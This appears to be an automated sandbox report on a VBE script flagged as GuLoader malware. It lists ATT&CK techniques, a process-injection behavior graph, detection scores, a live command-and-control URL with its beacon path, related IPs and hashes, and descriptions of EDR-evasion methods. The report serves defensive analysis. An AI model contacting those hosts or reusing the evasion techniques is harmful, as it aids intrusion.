              LSASS Memory2
              Process Discovery
              Remote Desktop ProtocolData from Removable Media3
              Ingress Tool Transfer
              Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain Accounts1
              Exploitation for Client Execution
              Logon Script (Windows)1
              DLL Side-Loading
              412
              Process Injection
              Security Account Manager31
              Virtualization/Sandbox Evasion
              SMB/Windows Admin SharesData from Network Shared Drive3
              Non-Application Layer Protocol
              Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal Accounts2
              PowerShell
              Login HookLogin Hook1
              Deobfuscate/Decode Files or Information
              NTDS1
              Application Window Discovery
              Distributed Component Object ModelInput Capture14
              Application Layer Protocol
              Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script1
              Abuse Elevation Control Mechanism
              LSA Secrets1
              File and Directory Discovery
              SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts3
              Obfuscated Files or Information
              Cached Domain Credentials13
              System Information Discovery
              VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items1
              Software Packing
              DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job1
              DLL Side-Loading
              Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1540843 Sample: EL-25-536_40005512_Le Cuivr... Startdate: 24/10/2024 Architecture: WINDOWS Score: 100 35 www.akkushaber.xyz 2->35 37 drive.usercontent.google.com 2->37 39 drive.google.com 2->39 55 Suricata IDS alerts for network traffic 2->55 57 Malicious sample detected (through community Yara rule) 2->57 59 Multi AV Scanner detection for submitted file 2->59 63 5 other signatures 2->63 10 powershell.exe 15 2->10         started        13 wscript.exe 1 2->13         started        signatures3 61 Performs DNS queries to domains with low reputation 35->61 process4 signatures5 69 Early bird code injection technique detected 10->69 71 Writes to foreign memory regions 10->71 73 Found suspicious powershell code related to unpacking or dynamic code loading 10->73 75 Queues an APC in another process (thread injection) 10->75 15 msiexec.exe 6 10->15         started        19 conhost.exe 10->19         started        77 Suspicious powershell command line found 13->77 79 Wscript starts Powershell (via cmd or directly) 13->79 81 Windows Scripting host queries suspicious COM object (likely to drop second stage) 13->81 83 Suspicious execution chain found 13->83 21 powershell.exe 14 19 13->21         started        process6 dnsIp7 41 142.250.185.142, 443, 49738, 49740 GOOGLEUS United States 15->41 49 Maps a DLL or memory area into another process 15->49 23 nJPhzxOixucOn.exe 15->23 injected 43 drive.google.com 142.250.185.78, 443, 49730 GOOGLEUS United States 21->43 45 drive.usercontent.google.com 142.250.186.97, 443, 49731, 49739 GOOGLEUS United States 21->45 51 Found suspicious powershell code related to unpacking or dynamic code loading 21->51 26 conhost.exe 21->26         started        signatures8 process9 signatures10 65 Maps a DLL or memory area into another process 23->65 67 Found direct / indirect Syscall (likely to bypass EDR) 23->67 28 dllhost.exe 23->28         started        process11 signatures12 85 Maps a DLL or memory area into another process 28->85 31 nJPhzxOixucOn.exe 28->31 injected process13 dnsIp14 47 www.akkushaber.xyz 104.21.70.11, 50008, 80 CLOUDFLARENETUS United States 31->47 53 Found direct / indirect Syscall (likely to bypass EDR) 31->53 signatures15

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand
              SourceDetectionScannerLabelLink
              EL-25-536_40005512_Le Cuivre_23102024.vbe21%ReversingLabsScript.Trojan.GuLoader
              No Antivirus matches
              No Antivirus matches
              SourceDetectionScannerLabelLink
              drive.google.com0%VirustotalBrowse
              drive.usercontent.google.com1%VirustotalBrowse
              SourceDetectionScannerLabelLink
              https://contoso.com/License0%URL Reputationsafe
              https://contoso.com/0%URL Reputationsafe
              https://nuget.org/nuget.exe0%URL Reputationsafe
              https://apis.google.com0%URL Reputationsafe
              http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name0%URL Reputationsafe
              http://nuget.org/NuGet.exe0%URL Reputationsafe
              http://pesterbdd.com/images/Pester.png0%URL Reputationsafe
              https://go.micro0%URL Reputationsafe
              https://contoso.com/Icon0%URL Reputationsafe
              https://schema.org/WPHeader0%URL Reputationsafe
              http://crl.micro0%URL Reputationsafe
              https://aka.ms/pscore680%URL Reputationsafe
              NameIPActiveMaliciousAntivirus DetectionReputation
              www.akkushaber.xyz
              104.21.70.11
              truetrue
                unknown
                drive.google.com
                142.250.185.78
                truefalseunknown
                drive.usercontent.google.com
                142.250.186.97
                truefalseunknown
                NameMaliciousAntivirus DetectionReputation
                http://www.akkushaber.xyz/0mzg/?eBn8=2O13gIliMn3YsUw5a3KzRkO18CQjk9KHJ2ezAhJRRaOqIrVzHHZDa9+gXbVcJvld3ors0lI+gPWWM5QB07s0EfgV3tv6nKYxZWLGcFl7cPul4bAwfY0iYcg=&lvf=o4BpHtrue
                  unknown
                  NameSourceMaliciousAntivirus DetectionReputation
                  https://habersosyal.xyznJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpfalse
                    unknown
                    https://linkpoker.xyznJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpfalse
                      unknown
                      https://haberinyeri.xyznJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpfalse
                        unknown
                        https://sakaryaescorthaber.pro/wp-content/uploads/2024/10/cropped-aslanaa-270x270.jpegdllhost.exe, 0000000B.00000002.2966636300.0000000004224000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpfalse
                          unknown
                          https://sakaryaescorthaber.pro/wp-content/uploads/2024/10/cropped-aslanaa-32x32.jpegdllhost.exe, 0000000B.00000002.2966636300.0000000004224000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpfalse
                            unknown
                            https://contoso.com/Licensepowershell.exe, 00000001.00000002.1937354419.0000024B35F20000.00000004.00000800.00020000.00000000.sdmpfalse
                            • URL Reputation: safe
                            unknown
                            https://sakaryaescorthaber.pro/wp-content/uploads/2024/10/cropped-aslanaa-180x180.jpegdllhost.exe, 0000000B.00000002.2966636300.0000000004224000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpfalse
                              unknown
                              https://gazipasanakliyat.xyznJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpfalse
                                unknown
                                https://www.google.commsiexec.exe, msiexec.exe, 00000008.00000003.2198426789.0000000004CBF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2254733813.0000000004CB9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687921782.0000000004C9E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2254769101.0000000004CBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                  unknown
                                  https://api.whatsapp.com/send?phone=dllhost.exe, 0000000B.00000002.2966636300.0000000004224000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpfalse
                                    unknown
                                    https://drive.google.com/msiexec.exe, msiexec.exe, 00000008.00000002.2785546396.0000000004C4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                      unknown
                                      https://aka.ms/pscore6lBfqpowershell.exe, 00000006.00000002.2096188756.0000000004DC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                        unknown
                                        https://contoso.com/powershell.exe, 00000001.00000002.1937354419.0000024B35F20000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://nuget.org/nuget.exepowershell.exe, 00000001.00000002.1937354419.0000024B35F20000.00000004.00000800.00020000.00000000.sdmpfalse
                                        • URL Reputation: safe
                                        unknown
                                        https://sakaryaescorthaber.pro/wp-content/uploads/2024/10/DERYA.gif)dllhost.exe, 0000000B.00000002.2966636300.0000000004224000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpfalse
                                          unknown
                                          https://drive.usercontent.google.compowershell.exe, 00000001.00000002.1909269428.0000024B27C5A000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1909269428.0000024B2634A000.00000004.00000800.00020000.00000000.sdmpfalse
                                            unknown
                                            https://sakaryaescorthaber.pro/wp-content/uploads/2024/10/NAZAN.gif)dllhost.exe, 0000000B.00000002.2966636300.0000000004224000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpfalse
                                              unknown
                                              https://apis.google.commsiexec.exe, msiexec.exe, 00000008.00000003.2198426789.0000000004CBF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2254733813.0000000004CB9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2687921782.0000000004C9E000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2254769101.0000000004CBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                              • URL Reputation: safe
                                              unknown
                                              https://ssl.gstatic.cmsiexec.exefalse
                                                unknown
                                                http://schemas.xmlsoap.org/ws/2005/05/identity/claims/namepowershell.exe, 00000001.00000002.1909269428.0000024B25EB1000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000006.00000002.2096188756.0000000004DC1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • URL Reputation: safe
                                                unknown
                                                https://kayserigercekmasaj.xyznJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  unknown
                                                  https://drive.usercontent.google.com/downlmsiexec.exefalse
                                                    unknown
                                                    https://sakaryaescorthaber.pro/wp-content/uploads/2024/10/yatayreklam.jpgdllhost.exe, 0000000B.00000002.2966636300.0000000004224000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      unknown
                                                      http://nuget.org/NuGet.exepowershell.exe, 00000001.00000002.1937354419.0000024B35F20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      unknown
                                                      https://kutahyagercekmasaj.xyznJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        unknown
                                                        https://sakaryaescorthaber.pro/wp-content/uploads/2024/10/cropped-aslanaa-192x192.jpegdllhost.exe, 0000000B.00000002.2966636300.0000000004224000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpfalse
                                                          unknown
                                                          http://drive.usercontent.google.compowershell.exe, 00000001.00000002.1909269428.0000024B27C6D000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            unknown
                                                            http://pesterbdd.com/images/Pester.pngpowershell.exe, 00000001.00000002.1909269428.0000024B260D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            unknown
                                                            http://www.apache.org/licenses/LICENSE-2.0.htmlpowershell.exe, 00000001.00000002.1909269428.0000024B260D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                              unknown
                                                              https://drive.google.com/V8msiexec.exe, 00000008.00000003.2254733813.0000000004CB9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2254769101.0000000004CBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                unknown
                                                                https://go.micropowershell.exe, 00000001.00000002.1909269428.0000024B26AE8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                • URL Reputation: safe
                                                                unknown
                                                                https://cdn.ampproject.org/v0/amp-sidebar-0.1.jsdllhost.exe, 0000000B.00000002.2966636300.0000000004224000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                  unknown
                                                                  https://contoso.com/Iconpowershell.exe, 00000001.00000002.1937354419.0000024B35F20000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  • URL Reputation: safe
                                                                  unknown
                                                                  https://drive.googPpowershell.exe, 00000001.00000002.1909269428.0000024B27C30000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                    unknown
                                                                    https://cdn.ampproject.org/v0/amp-analytics-0.1.jsdllhost.exe, 0000000B.00000002.2966636300.0000000004224000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                      unknown
                                                                      https://drive.usercontent.googhpowershell.exe, 00000001.00000002.1909269428.0000024B27C5A000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        unknown
                                                                        https://drive.usercontent.google.com/msiexec.exe, msiexec.exe, 00000008.00000003.2294240633.0000000004CBD000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2254733813.0000000004CB9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2688040815.0000000004CBC000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2241029730.0000000004CBF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2294155314.0000000004CB9000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000002.2785880619.0000000004CBF000.00000004.00000020.00020000.00000000.sdmp, msiexec.exe, 00000008.00000003.2254769101.0000000004CBD000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                          unknown
                                                                          https://maxcdn.bootstrapcdn.com/font-awesome/4.7.0/css/font-awesome.min.css?ver=6.6.2dllhost.exe, 0000000B.00000002.2966636300.0000000004224000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                            unknown
                                                                            http://drive.google.compowershell.exe, 00000001.00000002.1909269428.0000024B27C34000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              unknown
                                                                              https://cdn.ampproject.org/v0.jsdllhost.exe, 0000000B.00000002.2966636300.0000000004224000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                unknown
                                                                                https://genelhaberler.xyznJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  unknown
                                                                                  https://github.com/Pester/Pesterpowershell.exe, 00000001.00000002.1909269428.0000024B260D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                    unknown
                                                                                    https://schema.org/WPHeaderdllhost.exe, 0000000B.00000002.2966636300.0000000004224000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    unknown
                                                                                    https://aydingercekmasaj.xyznJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                      unknown
                                                                                      http://crl.micropowershell.exe, 00000006.00000002.2123953554.0000000007880000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                      • URL Reputation: safe
                                                                                      unknown
                                                                                      https://drive.google.com/ertificatesmsiexec.exe, 00000008.00000002.2785546396.0000000004C4A000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        unknown
                                                                                        https://girismarsbahis.xyznJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          unknown
                                                                                          https://bedavabahis.xyznJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                            unknown
                                                                                            https://drive.google.compowershell.exe, 00000001.00000002.1909269428.0000024B274E8000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000001.00000002.1909269428.0000024B260D8000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                              unknown
                                                                                              https://izmirgercekmasaj.xyznJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                unknown
                                                                                                https://aka.ms/pscore68powershell.exe, 00000001.00000002.1909269428.0000024B25EB1000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                                • URL Reputation: safe
                                                                                                unknown
                                                                                                https://sakaryaescorthaber.pro/wp-content/uploads/2024/10/aslan.gifdllhost.exe, 0000000B.00000002.2966636300.0000000004224000.00000004.10000000.00040000.00000000.sdmp, nJPhzxOixucOn.exe, 0000000C.00000002.2966509917.0000000002D04000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                                  unknown
                                                                                                  https://drive.usercontent.google.cmsiexec.exefalse
                                                                                                    unknown
                                                                                                    • No. of IPs < 25%
                                                                                                    • 25% < No. of IPs < 50%
                                                                                                    • 50% < No. of IPs < 75%
                                                                                                    • 75% < No. of IPs
                                                                                                    IPDomainCountryFlagASNASN NameMalicious
                                                                                                    142.250.185.78
                                                                                                    drive.google.comUnited States
                                                                                                    15169GOOGLEUSfalse
                                                                                                    142.250.185.142
                                                                                                    unknownUnited States
                                                                                                    15169GOOGLEUSfalse
                                                                                                    142.250.186.97
                                                                                                    drive.usercontent.google.comUnited States
                                                                                                    15169GOOGLEUSfalse
                                                                                                    104.21.70.11
                                                                                                    www.akkushaber.xyzUnited States
                                                                                                    13335CLOUDFLARENETUStrue
                                                                                                    Joe Sandbox version:41.0.0 Charoite
                                                                                                    Analysis ID:1540843
                                                                                                    Start date and time:2024-10-24 08:45:01 +02:00
                                                                                                    Joe Sandbox product:CloudBasic
                                                                                                    Overall analysis duration:0h 8m 56s
                                                                                                    Hypervisor based Inspection enabled:false
                                                                                                    Report type:full
                                                                                                    Cookbook file name:default.jbs
                                                                                                    Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                                    Number of analysed new started processes analysed:11
                                                                                                    Number of new started drivers analysed:0
                                                                                                    Number of existing processes analysed:0
                                                                                                    Number of existing drivers analysed:0
                                                                                                    Number of injected processes analysed:2
                                                                                                    Technologies:
                                                                                                    • HCA enabled
                                                                                                    • EGA enabled
                                                                                                    • AMSI enabled
                                                                                                    Analysis Mode:default
                                                                                                    Analysis stop reason:Timeout
                                                                                                    Sample name:EL-25-536_40005512_Le Cuivre_23102024.vbe
                                                                                                    Detection:MAL
                                                                                                    Classification:mal100.troj.expl.evad.winVBE@10/7@4/4
                                                                                                    EGA Information:
                                                                                                    • Successful, ratio: 20%
                                                                                                    HCA Information:
                                                                                                    • Successful, ratio: 79%
                                                                                                    • Number of executed functions: 105
                                                                                                    • Number of non-executed functions: 244
                                                                                                    Cookbook Comments:
                                                                                                    • Found application associated with file extension: .vbe
                                                                                                    • Exclude process from analysis (whitelisted): MpCmdRun.exe, WMIADAP.exe, SIHClient.exe, conhost.exe
                                                                                                    • Excluded domains from analysis (whitelisted): ocsp.digicert.com, slscr.update.microsoft.com, otelrules.azureedge.net, ctldl.windowsupdate.com, fe3cr.delivery.mp.microsoft.com
                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 4312 because it is empty
                                                                                                    • Execution Graph export aborted for target powershell.exe, PID 6044 because it is empty
                                                                                                    • Not all processes where analyzed, report is missing behavior information
                                                                                                    • Report creation exceeded maximum time and may have missing disassembly code information.
                                                                                                    • Report size getting too big, too many NtOpenKeyEx calls found.
                                                                                                    • Report size getting too big, too many NtProtectVirtualMemory calls found.
                                                                                                    • Report size getting too big, too many NtQueryValueKey calls found.
                                                                                                    • Some HTTP raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                    • Some HTTPS proxied raw data packets have been limited to 10 per session. Please view the PCAPs for the complete data.
                                                                                                    TimeTypeDescription
                                                                                                    02:46:01API Interceptor100x Sleep call for process: powershell.exe modified
                                                                                                    02:46:49API Interceptor1x Sleep call for process: msiexec.exe modified
                                                                                                    No context
                                                                                                    No context
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    CLOUDFLARENETUSOUTSTANDING PAYMENT STATUS 01199241024.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                    • 104.26.12.205
                                                                                                    PO-008847332.xlam.xlsxGet hashmaliciousUnknownBrowse
                                                                                                    • 104.21.53.112
                                                                                                    RFQ_64182MR_PDF.R00.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                    • 188.114.97.3
                                                                                                    g4Cyr2T5jq.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, Stealc, VidarBrowse
                                                                                                    • 104.21.53.8
                                                                                                    Urgent Quotation documents One Pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                    • 104.26.12.205
                                                                                                    #PO247762.docxGet hashmaliciousRemcosBrowse
                                                                                                    • 188.114.96.3
                                                                                                    file.exeGet hashmaliciousLummaC, StealcBrowse
                                                                                                    • 172.67.206.204
                                                                                                    Inova oferta nr F01281624PL.htmlGet hashmaliciousUnknownBrowse
                                                                                                    • 1.1.1.1
                                                                                                    file.exeGet hashmaliciousLummaC, Amadey, Credential Flusher, LummaC Stealer, StealcBrowse
                                                                                                    • 172.67.206.204
                                                                                                    VY871GcABT.exeGet hashmaliciousDCRatBrowse
                                                                                                    • 188.114.96.3
                                                                                                    MatchAssociated Sample Name / URLSHA 256DetectionThreat NameLinkContext
                                                                                                    3b5074b1b5d032e5620f69f9f700ff0eOUTSTANDING PAYMENT STATUS 01199241024.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                    • 142.250.186.97
                                                                                                    • 142.250.185.78
                                                                                                    scan_doc20241024.vbsGet hashmaliciousRemcosBrowse
                                                                                                    • 142.250.186.97
                                                                                                    • 142.250.185.78
                                                                                                    RFQ_64182MR_PDF.R00.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                    • 142.250.186.97
                                                                                                    • 142.250.185.78
                                                                                                    FedEx Shipping Document_pdf.htmlGet hashmaliciousUnknownBrowse
                                                                                                    • 142.250.186.97
                                                                                                    • 142.250.185.78
                                                                                                    Urgent Quotation documents One Pdf.vbsGet hashmaliciousAgentTeslaBrowse
                                                                                                    • 142.250.186.97
                                                                                                    • 142.250.185.78
                                                                                                    WBPWLAj09q.exeGet hashmaliciousPureLog Stealer, Snake Keylogger, VIP KeyloggerBrowse
                                                                                                    • 142.250.186.97
                                                                                                    • 142.250.185.78
                                                                                                    Adeleidae.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                    • 142.250.186.97
                                                                                                    • 142.250.185.78
                                                                                                    Douglas County Government.pdfGet hashmaliciousHtmlDropperBrowse
                                                                                                    • 142.250.186.97
                                                                                                    • 142.250.185.78
                                                                                                    https://t.ly/2jKWOGet hashmaliciousHTMLPhisher, Mamba2FABrowse
                                                                                                    • 142.250.186.97
                                                                                                    • 142.250.185.78
                                                                                                    http://molatoriism.icuGet hashmaliciousHTMLPhisherBrowse
                                                                                                    • 142.250.186.97
                                                                                                    • 142.250.185.78
                                                                                                    37f463bf4616ecd445d4a1937da06e19OUTSTANDING PAYMENT STATUS 01199241024.vbsGet hashmaliciousAgentTesla, GuLoaderBrowse
                                                                                                    • 142.250.186.97
                                                                                                    • 142.250.185.142
                                                                                                    RFQ_64182MR_PDF.R00.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                    • 142.250.186.97
                                                                                                    • 142.250.185.142
                                                                                                    Monetary_002993034958293.jsGet hashmaliciousUnknownBrowse
                                                                                                    • 142.250.186.97
                                                                                                    • 142.250.185.142
                                                                                                    Adeleidae.exeGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                    • 142.250.186.97
                                                                                                    • 142.250.185.142
                                                                                                    FACTURA A-7507_H1758.exeGet hashmaliciousGuLoaderBrowse
                                                                                                    • 142.250.186.97
                                                                                                    • 142.250.185.142
                                                                                                    ZW_PCCE-010023024001.batGet hashmaliciousRemcos, GuLoaderBrowse
                                                                                                    • 142.250.186.97
                                                                                                    • 142.250.185.142
                                                                                                    Distribuciones Enelca Ja#U00e9n, S.L. PEDIDO 456799.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                    • 142.250.186.97
                                                                                                    • 142.250.185.142
                                                                                                    Pedido de Cota#U00e7#U00e3o-24100004_lista comercial.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                    • 142.250.186.97
                                                                                                    • 142.250.185.142
                                                                                                    69-33-600 Kreiselkammer ER3.vbsGet hashmaliciousGuLoader, Snake KeyloggerBrowse
                                                                                                    • 142.250.186.97
                                                                                                    • 142.250.185.142
                                                                                                    xxJfSec58P.exeGet hashmaliciousVidarBrowse
                                                                                                    • 142.250.186.97
                                                                                                    • 142.250.185.142
                                                                                                    No context
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:modified
                                                                                                    Size (bytes):11608
                                                                                                    Entropy (8bit):4.8908305915084105
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:192:yVsm5eml2ib4LxoeRm3YrKkzYFQ9smKp5pVFn3eGOVpN6K3bkkjo5xgkjDt4iWNH:yCib4PYbLVoGIpN6KQkj2qkjh4iUx6iP
                                                                                                    MD5:FE1902820A1CE8BD18FD85043C4D9C5C
                                                                                                    SHA1:62F24EAE4A42BA3AE454A6FAB07EF47D1FE9DFD6
                                                                                                    SHA-256:8BBDC66564B509C80EA7BE85EA9632ACD0958008624B829EA4A24895CA73D994
                                                                                                    SHA-512:8D1BADE448F0C53D6EC00BC9FACDBCB1D4B1B7C61E91855206A08BDBF61C6E4A40210574C4193463C8A13AE692DD80897F3CE9E39958472705CF17D77FE9C1D9
                                                                                                    Malicious:false
                                                                                                    Reputation:moderate, very likely benign file
                                                                                                    Preview:PSMODULECACHE.....$...z..T...C:\Program Files (x86)\WindowsPowerShell\Modules\PowerShellGet\1.0.0.1\PSModule.psm1*.......Install-Script........Save-Module........Publish-Module........Find-Module........Download-Package........Update-Module........Find-Command........Unregister-PSRepository........Get-InstalledScript........Get-DynamicOptions........Add-PackageSource........Register-PSRepository........Find-DscResource........Publish-Script........Find-RoleCapability........Uninstall-Package........Get-PackageDependencies........pumo........fimo........Find-Script........Initialize-Provider........Get-PackageProviderName........Test-ScriptFileInfo........Get-InstalledModule........Update-ScriptFileInfo........Get-InstalledPackage........Resolve-PackageSource........Uninstall-Module........inmo........Remove-PackageSource........Update-Script........Uninstall-Script........Update-ModuleManifest........Get-Feature........Install-Module........Install-Package........New-ScriptFileInfo...
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:data
                                                                                                    Category:dropped
                                                                                                    Size (bytes):64
                                                                                                    Entropy (8bit):1.1940658735648508
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:NlllulriAz:NllU2A
                                                                                                    MD5:88CD010331786B5B0D8F925A7B5EFE73
                                                                                                    SHA1:47B913E734AACA1331C5E8561FC01340D899A2DF
                                                                                                    SHA-256:58BC41921E8386AF7B31594E38A11BC63533D8D2B9D3803C640C3AAD8BD3CFF4
                                                                                                    SHA-512:437792D19577187888FC54489B47D34506E6275910DD03690A9BC746D23A906329251B2DBA227F82B39686C54A4E37A366DF5B5566F2387D57C882706B8D4E45
                                                                                                    Malicious:false
                                                                                                    Preview:@...e.................................:.%............@..........
                                                                                                    Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                    File Type:ASCII text, with no line terminators
                                                                                                    Category:dropped
                                                                                                    Size (bytes):60
                                                                                                    Entropy (8bit):4.038920595031593
                                                                                                    Encrypted:false
                                                                                                    SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                    MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                    SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                    SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                    SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
